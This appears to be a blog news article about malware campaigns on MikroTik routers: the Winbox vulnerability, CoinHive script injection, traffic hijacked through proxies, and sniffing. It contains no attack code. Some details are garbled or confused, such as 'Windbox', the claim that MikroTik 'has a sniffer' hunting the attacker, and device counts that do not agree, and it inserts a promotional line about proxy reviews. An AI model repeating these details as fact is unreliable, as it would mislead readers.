Back to Contents

Proxy Drama: High-Security Alert on Thousands of MikroTik Routers

If you are using a router manufactured by MikroTik, you need to contact their support team to check if your router is one of the affected units to have a malware.

This April, China’s Netlab 360 security researchers found out that thousands of routers manufactured by MikroTik, a Latvian company, have a vulnerability. This vulnerability was easily infected by malware that has, in turn, affected thousands of MikroTik’s router units.

MikroTik is aware of the vulnerability in their products. In fact, they even released a public statement about it. Also, to patch the vulnerability, they launched a software update in April, the same month the vulnerability was found.

However, thousands of their devices have still a susceptibility.  According to China’s Netlab 360 security researchers, there are still over 370,000 MikroTik units that are affected by the vulnerability and at a high risk of getting infected by a malware once found out by attackers.

True enough, the devices were infected by the malware after the vulnerability was made public. The vulnerability was a public record and can be found in WikiLeak’s page under the CIA’s “Vault7” toolkit.

According to China’s Netlab 360 report, the attackers continue to spy on the devices. The number of devices that are being spied on is over 7,500. The attackers are very active in sending web traffic from these devices to different remote servers.

Moreover, over 239,000 units that have been affected were said to be accessible in a single internet address block. This is very dangerous and a clear threat to online security, especially that MikroTik is known to manufacture routing and wireless hardware for ISP or internet service providers. They are also catering to different businesses worldwide which include manufacturing wireless backbones and outdoor fiber routers for internet service providers.

So imagine the damage that this vulnerability and the malware has caused. But what is more worrisome is that the affected routers are configured with the company’s Winbox router configuration utility, which still does not have a patch.

These routes are widely distributed which means there are still devices out there that are at risks of potential malware. Some of these devices were found to be in Brazil and Russia. There are also some in the USA with over 14,000 affected devices.

Malware’s on MikroTik Routers

With this vulnerability being out there and waiting to be hacked, it is no surprise that another team of security researchers will find malware campaigns against MikroTik.

It was researchers in Trustwave who found two malware campaigns against the company. This campaign targets those devices in Brazil. The malware that was found, that is evident in the thousands of devices, is CoinHive Malware.

CoinHive malware can send a JavaScript on an error page from the web proxy server. And once it successfully injected the script, it can intercept the device’s web traffic.

Good thing, all the information, data, and traffic that this CoinHive malware is getting from the devices are being blocked by an access control list (ACL). What’s funnier is that the attackers themselves were the one who created this. This was discovered by China’s NetLab 360 security researcher Genshen Ye.

The other malware campaign that was found out by the team at NetLab 360 converts the affected router into a malicious proxy network. This proxy network only allows access from single net-block. All the traffic from the affected router is going in a single netblock that was traced and found out to be located in the United Kingdom. This is why it’s so important to read proxy reviews before you buy!

Another malware that continues to pester on the thousands of affected devices is that this malware is gathering the router’s IP address. The malware is a scheduled task that commands the router’s IP address to be reported to the attacker. This is needed in the event that the affected router is rebooted. Also, this malware seems to scan other vulnerable routers.

These attack on MikroTik’s devices is a clear challenge to them. Will they be able to patch this problem or not? MikroTik has a sniffer who is currently working on finding out the malware and the attacker.

However, the malware continues to affect devices. In fact, according to NetLab 360, the 7,500 routers that were affected by the vulnerability was already infiltrated by a malware that has been leaking and streaming network traffic.

Most of this traffic is FTP and email-based traffic. There was also traffic that is connected with network management. And the data or traffic are found out to be sent in an ISP that is located in Belize.

MikroTik’s Move to Patch the Vulnerability

According to one of MikroTik’s regional ISP employees, once MikroTik found out the vulnerability, they immediately used their homegrown updating system. This was the patch they used for the vulnerability. However, this system update is not enough. There are still routers that are affected.

With this kind of vulnerability in their products, MikroTik needs to be strict and serious with their security standards and look for other ways to solve their shortcomings. If not, many people and large businesses will be affected and millions of damages will happen if they fail to solve this vulnerability as soon as possible.

There are many attackers out there. And if they found out about this and discovered way on how to infiltrate these devices to send malicious malware and evil codes to these routers, it is a big threat to online security of their millions of users.

Also, their product Windbox, which is said to be a target of the exploit, needs to be looked at very carefully. One of the standard practices of MikroTik is to avoid any vulnerabilities to their systems or devices. Once deployed, they shut down all the unnecessary services on the units, one that includes the Winbox.

However, this standard deployment practice should be looked at closely. They should also have other security practice to ensure that what they are giving their customer is vulnerability free and unhackable.

So if you are using a MikroTik router, better to check with their support department to check if your router is one of the affected devices. Also asked what is the best thing to do in this situation.


Categories: Torrenting,

Elizabeth Kelly